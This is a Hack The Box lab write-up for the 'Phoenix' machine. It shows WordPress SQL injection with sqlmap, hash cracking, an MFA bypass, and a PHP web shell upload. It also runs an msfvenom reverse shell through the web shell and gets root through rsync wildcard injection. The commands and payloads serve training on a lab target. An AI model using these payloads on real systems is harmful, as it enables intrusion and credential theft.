HTB Writeup: Phoenix
Rising from ashes and flying over the MFAs
Enumeration
nmap
➜ mostwanted002@Loki Phoenix please nmap -sC -sV -T3 -oA nmap-tcp-all-ports -p- -iL ip.txt
[sudo] password for mostwanted002:
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-26 19:50 IST
Nmap scan report for 10.129.133.247 (10.129.133.247)
Host is up (0.075s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 9d:f3:87💿34:75:83:e0:3f:50:d8:39:c6:a5:32:9f (RSA)
| 256 ab:61:ce:eb:ed:e2:86:76:e9:e1:52:fa:a5:c7:7b:20 (ECDSA)
|_ 256 26:2e:38:ca:df:72:d4:54:fc:75:a4:91:65:cc:e8:b0 (ED25519)
80/tcp open http Apache httpd
|_http-server-header: Apache
|_http-title: Did not follow redirect to https://phoenix.htb/
443/tcp open ssl/http Apache httpd
| tls-alpn:
| h2
|_ http/1.1
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache
| ssl-cert: Subject: commonName=phoenix.htb/organizationName=Phoenix Security Ltd./stateOrProvinceName=Arizona/countryName=US
| Not valid before: 2022-02-15T20:08:43
|_Not valid after: 2032-02-13T20:08:43
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
|_http-title: Did not follow redirect to https://phoenix.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 59.71 seconds
-
A web server is listening on TPC/80 and TCP/443.
-
The listener on TCP/80 is redirecting the requests to
https://phoenix.htb
-
The web application is also found to be a WordPress instance.
wpscan
➜ mostwanted002@Loki Phoenix wpscan --url https://phoenix.htb/ --api-token <wp_scan_api> --disable-tls-checks
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]y
[i] Updating the Database ...
[i] Update completed.
[+] URL: https://phoenix.htb/ [10.129.133.247]
[+] Started: Sun Jun 26 20:07:10 2022
Interesting Finding(s):
[+] Headers
| Interesting Entry: server: Apache
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] robots.txt found: https://phoenix.htb/robots.txt
| Interesting Entries:
| - /wp-admin/
| - /wp-admin/admin-ajax.php
| Found By: Robots Txt (Aggressive Detection)
| Confidence: 100%
[+] WordPress version 5.9 identified (Insecure, released on 2022-01-25).
| Found By: Rss Generator (Passive Detection)
| - https://phoenix.htb/feed/, <generator>https://wordpress.org/?v=5.9</generator>
| - https://phoenix.htb/comments/feed/, <generator>https://wordpress.org/?v=5.9</generator>
|
| [!] 3 vulnerabilities identified:
|
| [!] Title: WordPress (5.9-5.9.1) / Gutenberg (9.8.0-12.7.1) - Contributor+ Stored Cross-Site Scripting
| Fixed in: 5.9.2
| References:
| - https://wpscan.com/vulnerability/1fd6742e-1a32-446d-be3d-7cce44f8f416
| - https://wordpress.org/news/2022/03/wordpress-5-9-2-security-maintenance-release/
|
| [!] Title: WordPress < 5.9.2 - Prototype Pollution in jQuery
| Fixed in: 5.9.2
| References:
| - https://wpscan.com/vulnerability/1ac912c1-5e29-41ac-8f76-a062de254c09
| - https://wordpress.org/news/2022/03/wordpress-5-9-2-security-maintenance-release/
|
| [!] Title: WordPress < 5.9.2 / Gutenberg < 12.7.2 - Prototype Pollution via Gutenberg’s wordpress/url package
| Fixed in: 5.9.2
| References:
| - https://wpscan.com/vulnerability/6e61b246-5af1-4a4f-9ca8-a8c87eb2e499
| - https://wordpress.org/news/2022/03/wordpress-5-9-2-security-maintenance-release/
| - https://github.com/WordPress/gutenberg/pull/39365/files
[+] WordPress theme in use: coming-soon-event
| Location: https://phoenix.htb/wp-content/themes/coming-soon-event/
| Latest Version: 1.0.8 (up to date)
| Last Updated: 2021-08-24T00:00:00.000Z
| Readme: https://phoenix.htb/wp-content/themes/coming-soon-event/readme.txt
| Style URL: https://phoenix.htb/wp-content/themes/coming-soon-event/style.css?ver=1.0.0
| Style Name: Coming Soon Event
| Description: The Coming Soon Event under construction theme will play a big role in boosting up the business and ...
| Author: blogwp
|
| Found By: Css Style In Homepage (Passive Detection)
| Confirmed By: Css Style In 404 Page (Passive Detection)
|
| Version: 1.0.8 (80% confidence)
| Found By: Style (Passive Detection)
| - https://phoenix.htb/wp-content/themes/coming-soon-event/style.css?ver=1.0.0, Match: 'Version: 1.0.8'
[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] Plugin(s) Identified:
[+] accordion-slider-gallery
| Location: https://phoenix.htb/wp-content/plugins/accordion-slider-gallery/
| Latest Version: 2.2
| Last Updated: 2022-05-07T11:22:00.000Z
|
| Found By: Urls In Homepage (Passive Detection)
| Confirmed By: Urls In 404 Page (Passive Detection)
|
| The version could not be determined.
[+] asgaros-forum
| Location: https://phoenix.htb/wp-content/plugins/asgaros-forum/
| Last Updated: 2022-01-30T12:54:00.000Z
| [!] The version is out of date, the latest version is 2.0.0
|
| Found By: Urls In Homepage (Passive Detection)
| Confirmed By: Urls In 404 Page (Passive Detection)
|
| [!] 4 vulnerabilities identified:
|
| [!] Title: Asgaros Forum < 1.15.13 - Unauthenticated SQL Injection
| Fixed in: 1.15.13
| References:
| - https://wpscan.com/vulnerability/36cc5151-1d5e-4874-bcec-3b6326235db1
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24827
| - https://plugins.trac.wordpress.org/changeset/2611560/asgaros-forum
|
| [!] Title: Asgaros Forums < 1.15.14 - Admin+ Stored Cross-Site Scripting
| Fixed in: 1.15.14
| References:
| - https://wpscan.com/vulnerability/70b5fd89-4b59-4cbb-b60f-ac54fbb5a3e3
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42365
| - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-42365
|
| [!] Title: Asgaros Forum < 1.15.15 - Admin+ SQL Injection via forum_id
| Fixed in: 1.15.15
| References:
| - https://wpscan.com/vulnerability/c60a3d40-449c-4c84-8d13-68c04267c1d7
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25045
| - https://plugins.trac.wordpress.org/changeset/2642215
|
| [!] Title: Asgaros Forum < 2.0.0 - Subscriber+ Blind SQL Injection
| Fixed in: 2.0.0
| References:
| - https://wpscan.com/vulnerability/35272197-c973-48ad-8405-538bfbafa172
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0411
| - https://plugins.trac.wordpress.org/changeset/2669226/asgaros-forum
|
| Version: 1.15.12 (10% confidence)
| Found By: Query Parameter (Passive Detection)
| - https://phoenix.htb/wp-content/plugins/asgaros-forum/skin/widgets.css?ver=1.15.12
[+] photo-gallery-builder
| Location: https://phoenix.htb/wp-content/plugins/photo-gallery-builder/
| Latest Version: 2.3
| Last Updated: 2022-05-07T11:20:00.000Z
|
| Found By: Urls In Homepage (Passive Detection)
| Confirmed By: Urls In 404 Page (Passive Detection)
|
| The version could not be determined.
[+] pie-register
| Location: https://phoenix.htb/wp-content/plugins/pie-register/
| Latest Version: 3.7.5.1
| Last Updated: 2022-06-13T07:37:00.000Z
|
| Found By: Urls In Homepage (Passive Detection)
| Confirmed By: Urls In 404 Page (Passive Detection)
|
| [!] 14 vulnerabilities identified:
|
| [!] Title: Pie Register - wp-login.php Multiple Parameter XSS
| Fixed in: 1.31
| References:
| - https://wpscan.com/vulnerability/22a823d1-848d-411c-a7bd-708a503ec193
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4954
| - https://www.securityfocus.com/bid/61140/
| - https://exchange.xforce.ibmcloud.com/vulnerabilities/85604
|
| [!] Title: Pie Register <= 2.0.13 - Privilege escalation
| Fixed in: 2.0.14
| References:
| - https://wpscan.com/vulnerability/9c9f66f2-ef80-4673-83a5-6e5a8e19012a
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8802
| - https://security.szurek.pl/pie-register-2013-privilege-escalation.html
|
| [!] Title: Pie Register <= 2.0.14 - Cross-Site Scripting (XSS)
| Fixed in: 2.0.15
| References:
| - https://wpscan.com/vulnerability/44b6576c-2989-4b8e-8662-07c85c0028c2
| - https://packetstormsecurity.com/files/130774/
|
| [!] Title: Pie Register 2.0.14-2.0.15 - SQL Injection
| Fixed in: 2.0.16
| References:
| - https://wpscan.com/vulnerability/f0b9e57d-e319-415d-8333-48586c111108
| - https://g0blin.co.uk/g0blin-00040/
|
| [!] Title: Pie Register 2.0.14-2.0.15 - Privilege Escalation
| Fixed in: 2.0.16
| References:
| - https://wpscan.com/vulnerability/f30f77bd-2e6e-45cd-ac02-c9d3985844da
| - https://g0blin.co.uk/g0blin-00041/
|
| [!] Title: Pie-Register <= 2.0.18 - Unauthenticated Reflected Cross-Site Scripting (XSS)
| Fixed in: 2.0.19
| References:
| - https://wpscan.com/vulnerability/6588a392-1bfa-4699-ae82-ffd22a0eac61
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7377
| - https://www.securityfocus.com/archive/1/536668
| - https://github.com/GTSolutions/Pie-Register
|
| [!] Title: Pie-Register <= 2.0.18 - Authenticated Blind SQL Injection
| Fixed in: 2.0.19
| References:
| - https://wpscan.com/vulnerability/d38db297-0e1f-44a8-86f0-2349a2017342
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7682
| - https://www.securityfocus.com/archive/1/536669
| - https://github.com/GTSolutions/Pie-Register
| - https://packetstormsecurity.com/files/133929/
|
| [!] Title: Pie Register <= 3.0.9 - Authenticated Blind SQL Injection
| Fixed in: 3.0.10
| References:
| - https://wpscan.com/vulnerability/eff197b9-254e-4452-a63d-25c64d0c4a2c
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10969
| - https://www.exploit-db.com/exploits/44867/
| - https://seclists.org/fulldisclosure/2018/Jun/32
| - https://plugins.trac.wordpress.org/changeset/1892614/pie-register
|
| [!] Title: Pie Register <= 3.0.17 - Unauthenticated Cross-Site Scripting (XSS)
| Fixed in: 3.0.18
| References:
| - https://wpscan.com/vulnerability/2a05ebe6-ad16-4070-90ae-be600cfe2b08
| - https://plugins.trac.wordpress.org/changeset/1962835/pie-register
| - https://packetstormsecurity.com/files/149924/
|
| [!] Title: Pie Register < 3.1.2 - SQL Injection
| Fixed in: 3.1.2
| References:
| - https://wpscan.com/vulnerability/44262b4f-d6fa-4333-ac95-d970d93e0802
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15659
|
| [!] Title: Pie Register < 3.7.0.1 - Reflected Cross-Site Scripting (XSS)
| Fixed in: 3.7.0.1
| References:
| - https://wpscan.com/vulnerability/f1b67f40-642f-451e-a67a-b7487918ee34
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24239
| - https://plugins.trac.wordpress.org/changeset/2507536/
|
| [!] Title: Pie Register < 3.7.1.6 - Unauthenticated SQL Injection
| Fixed in: 3.7.1.6
| References:
| - https://wpscan.com/vulnerability/6bed00e4-b363-43b8-a392-d068d342151a
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24731
|
| [!] Title: Pie Register < 3.7.1.6 - Unauthenticated Arbitrary Login
| Fixed in: 3.1.7.6
| References:
| - https://wpscan.com/vulnerability/40d347b1-b86e-477d-b4c6-da105935ce37
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24647
|
| [!] Title: Pie Register < 3.7.2.4 - Open Redirect
| Fixed in: 3.7.2.4
| Reference: https://wpscan.com/vulnerability/f6efa32f-51df-44b4-bbba-e67ed5785dd4
|
| The version could not be determined.
[+] timeline-event-history
| Location: https://phoenix.htb/wp-content/plugins/timeline-event-history/
| Latest Version: 2.2
| Last Updated: 2022-05-07T11:26:00.000Z
|
| Found By: Urls In Homepage (Passive Detection)
| Confirmed By: Urls In 404 Page (Passive Detection)
|
| The version could not be determined.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:04 <==============================================================================> (137 / 137) 100.00% Time: 00:00:04
[i] No Config Backups Found.
[+] WPScan DB API OK
| Plan: free
| Requests Done (during the scan): 7
| Requests Remaining: 68
[+] Finished: Sun Jun 26 20:07:23 2022
[+] Requests Done: 202
[+] Cached Requests: 7
[+] Data Sent: 41.031 KB
[+] Data Received: 18.628 MB
[+] Memory used: 217.18 MB
[+] Elapsed time: 00:00:12
-
The wordpress installation is found to be vulnerable to
[CVE-2021-24827](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24827)
, an Unauthenticated SQL Injection in Asgaros Forum versions <1.15.13
. The version reported by wpscan is1.15.12
-
The forum is found at
https://phoenix.htb/forum/
Initial Foothold
sqlmap
-
A sqlmap scan is initiated to find the attack vector in the vulnerable plugin.
-
According the PoC present at
[WPScan Database Website](https://wpscan.com/vulnerability/36cc5151-1d5e-4874-bcec-3b6326235db1)
, the vulnerable URL ishttps://example.com/forum/?subscribe_topic=<INJECTION>
--- Parameter: subscribe_topic (GET) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: subscribe_topic=0 AND (SELECT 1495 FROM (SELECT(SLEEP(5)))KCSU) --- [20:24:13] [INFO] the back-end DBMS is MySQL web application technology: Apache back-end DBMS: MySQL >= 5.0.12
-
The parameter is time-based injection. This can be really slow in case of exfiltrating everything. To keep the attack precise and quick, only specific tables from specific databases can be extracted.
-
To extract list of databases available on remote host,
--dbs
flag in sqlmap[20:29:37] [INFO] the back-end DBMS is MySQL web application technology: Apache back-end DBMS: MySQL >= 5.0.12 [20:29:37] [INFO] fetching database names [20:29:37] [INFO] fetching number of databases [20:29:37] [INFO] resumed: 2 [20:29:37] [INFO] resumed: information_schema [20:29:37] [INFO] resumed: wordpress available databases [2]: [*] information_schema [*] wordpress [20:29:37] [INFO] fetched data logged to text files under '/home/mostwanted002/.local/share/sqlmap/output/phoenix.htb' [*] ending @ 20:29:37 /2022-06-26/
-
The wordpress user information is stored in the database
wordpress
within the tablewp_users
.user_pass user_login $P$BA5zlC0IhOiJKMTK.nWBgUB4Lxh/gc. Phoenix $P$B8eBH6QfVODeb/gYCSJRvm9MyRv7xz. john $P$BV5kUPHrZfVDDWSkvbt/Fw3Oeozb.G. Jsmith $P$BJCq26vxPmaQtAthFcnyNv1322qxD91 Jane $P$BzalVhBkVN.6ii8y/nbv3CTLbC0E9e. Jack
-
The hashes then can be cracked using hashcat. The hashmode is identified as
phppass
.\hashcat.exe -m 400 -a 0 Y:\Documents\HTB\Phoenix\wp_users.hash -O G:\Wordlists\rockyou.txt # -m 400 -> hash mode 400 (phppass) # -a 0 -> Attack Mode 0 (Dictionary based attack) # -O -> Optimized Kernel (for faster attack speeds)
-
3 hashes are recovered out of 5
$P$BA5zlC0IhOiJKMTK.nWBgUB4Lxh/gc.:phoenixthefirebird14:Phoenix $P$B8eBH6QfVODeb/gYCSJRvm9MyRv7xz.:password@1234:john $P$BV5kUPHrZfVDDWSkvbt/Fw3Oeozb.G.:superphoenix:Jsmith
Wordpress Login and MFA bypass
-
From Forums, it is found the user
Phoenix
is the wordpress/website admin. -
On logging in with the credentials
Phoenix:phoenixthefirebird14
, the website redirects to a 2 Factor Authentication page. -
A hidden form is found in the source code of this MFA web page.
<form name="f" id="mo2f_backto_inline_registration" method="post" action="https://phoenix.htb/login/" class="mo2f_display_none_forms"> <input type="hidden" name="miniorange_back_inline_reg_nonce" value="0df0747734"/> <input type="hidden" name="session_id" value="NMHrRoahet3PrAiT9ELW+r+3mrF/pzu2K68zA4d+8i/mAHPQX+8aWxSbWK+jdtWh2CfGmlF6YVw9DRVSQWremNA+YhjzBpMABcDy8Zb2jlo="/> <input type="hidden" name="option" value="miniorange2f_back_to_inline_registration"> <input type="hidden" name="redirect_to" value="https://phoenix.htb/wp-admin/"/> </form>
According to the documentation of
Miniorange
plugin, users can register their own MFA on first login. To exploit this functionality, the hidden for is to be submitted.This form is On inspecting the source code further, an interesting piece of code is found in the
<script>
section at the end of the web page.<scrip>jQuery('#miniorange_otp_token_back').click(function(){ jQuery('#mo2f_backto_inline_registration').submit(); }); jQuery('a[href="#mo2f_backup_option"]').click(function() { jQuery('#mo2f_backup').submit(); }); jQuery('a[href="#mo2f_backup_generate"]').click(function() { jQuery('#mo2f_create_backup_codes').submit(); }); function mologinback() { jQuery('#mo2f_backto_mo_loginform').submit(); } function mologinforgotphone() { jQuery('#mo2f_show_forgotphone_loginform').submit(); } var is_ajax = ''; if(is_ajax){ jQuery('#mo2fa_softtoken').keypress(function (e) { if (e.which == 13) {//Enter key pressed e.preventDefault(); mo2f_otp_ajax(); } }); jQuery("#miniorange_otp_token_submit").click(function(e){ e.preventDefault(); mo2f_otp_ajax(); }); function mo2f_otp_ajax(){ jQuery('#mo2fa_softtoken').prop('disabled','true'); jQuery('#miniorange_otp_token_submit').prop('disabled','true'); var data = { "action" : "mo2f_ajax", "mo2f_ajax_option" : "mo2f_ajax_otp", "mo2fa_softtoken" : jQuery( "input[name=\'mo2fa_softtoken\']" ).val(), "miniorange_soft_token_nonce" : jQuery( "input[name=\'miniorange_soft_token_nonce\']" ).val(), "session_id" : jQuery( "input[name=\'session_id\']" ).val(), "redirect_to" : jQuery( "input[name=\'redirect_to\']" ).val(), "request_origin_method" : jQuery( "input[name=\'request_origin_method\']" ).val(), }; jQuery.post(my_ajax_object.ajax_url, data, function(response) { if(typeof response.data === "undefined") jQuery("html").html(response); else if(response.data.reload) location.reload( true ); else location.href = response.data.redirect; }); } } </script>
The first function is submitting the required form via jQuery. To trigger this action, the same jQuery request can be issued in the developer console of the web browser.
-
Now the 2FA can be skipped using
Skip Two Factor
option at the end of this form.
Webshell
-
The further browsing of wordpress configuration and plugins, an interesting plugin is found.
Download from files
. -
By default, it doesn’t allow to upload
.PHP
,.PHP3
and similar files. -
To bypass this,
.phtml
can be added to theAccept types
setting under Plugin Settings tab. -
After the settings are saved, a PHP web shell with extension
.phtml
can be uploaded.<?php //payload.phtml passthru($_GET['cmd']); ?>
-
The successful execution of command then can be checked by visiting
https://phoenix.htb/wp-content/uploads/payload.phtml?cmd=cat%20/etc/passwd
Reverse Shell
-
A simple bash reverse shell can be achieved by using a generic TCP reverse shell payload from
msfvenom
.➜ mostwanted002@Loki Phoenix msfvenom -p linux/x64/shell_reverse_tcp LHOST=<Listener IP> LPORT=<Listener Port> PrependFork=true -f elf | base64 -w0 [-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload [-] No arch selected, selecting arch: x64 from the payload No encoder specified, outputting raw payload Payload size: 106 bytes Final size of elf file: 226 bytes <Base64 Payload>
-
The URLs can be then visited in the given order to obtain a reverse shell on the listener:
https://phoenix.htb/wp-content/uploads/payload.phtml?cmd=echo <base64_payload> | base64 -d > exploit
https://phoenix.htb/wp-content/uploads/payload.phtml?cmd=chmod 0755 ./exploit
https://phoenix.htb/wp-content/uploads/payload.phtml?cmd=./exploit
User Access
-
On looking at the contents of
/etc/passwd
, another user with usernameeditor
and full nameJohn Smith
is found. -
When the
Jsmith
’s password from wordpress db are used as SSH credentials foreditor
, a prompt for 2FA appears. This 2FA is found to be different from the one installed on the website. -
A way to bypass this MFA is required. For further enumeration,
[linpeas.sh](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS)
is used. -
Reading the output of linPEAS, the configuration for login 2FA module is found in
/etc/pam.d/sshd
auth [success=1 default=ignore] pam_access.so accessfile=/etc/security/access-local.conf auth required pam_google_authenticator.so nullok user=root secret=/var/lib/twofactor/${USER}
-
The default mode is set to
ignore
which will force the authentication on next method, that is Google 2FA PAM module. -
The man pages of
pam_access.so
, describes the parameteracessfile=
asaccessfile=/path/to/access.conf
Indicate an alternative access.conf style configuration file to override the default. This can be useful when different services need different access lists.
-
The contents of
/etc/security/access-local.conf
are found to be:(remote) wp_user@phoenix:/tmp$ cat /etc/security/access-local.conf + : ALL : 10.11.12.13/24 - : ALL : ALL
- This indicates that clients from the network
10.11.12.13/24
can authenticate using standardpam_access.so
instead of Google’s 2FA authentication, hence no 2FA required.
- This indicates that clients from the network
-
The remote host has a network interface
eth0
, with the IP10.11.12.13
. This implies accessing SSH on10.11.12.13
from the reverse shell won’t require 2FA. Testing it out turns out to be successful.
Privilege Escalation
Enumeration
-
For enumerating with newer privileges, the linPEAS is run again. A
/backup
directory is found owned by the usereditor
, in which zip files are periodically saved and written byroot
. -
No obvious cron jobs and services were found in the linPEAS enumeration that were related to this activity. To monitor the activities on the remote host,
pspy64
can be used. It can monitor commands being executed and file system activities all together../pspy64 -i 1000 -f
-
A custom binary execution is found in the output of
pspy64
The binary is located at
/usr/local/bin/cron.sh.x
-
On executing the binary as user
editor
the complete execution can be traced bypspy64
, since it is running with same privileges.#!/bin/bash NOW=$(date +"%Y-%m-%d-%H-%M") FILE="phoenix.htb.$NOW.tar" cd /backups mysqldump -u root wordpress > dbbackup.sql tar -cf $FILE dbbackup.sql && rm dbbackup.sql gzip -9 $FILE find . -type f -mmin +30 -delete rsync --ignore-existing -t *.* [email protected]:/backups/ /usr/local/bin/cron.sh.x
-
The
rsync
command has a wildcard in the command being executed.
Exploitation
-
The
-e
flag in rsync is used to execute a custom script for the command issued. The wildcard can be exploited by creating a file with the name-e sh exploit.sh
and placing a fileexploit.sh
in the/backups
directory. [ Source]#!/bin/sh # Contents of exploit.sh id > pwned.txt # For proof of execution /tmp/exploit # the generic reverse shell payload created using msfvenom.
-
To create the blank file, following command can be issued as
editor
since the user has ownership and write access to the/backups
directory.touch -- "-e sh exploit.sh"
The remote host is now completely compromised.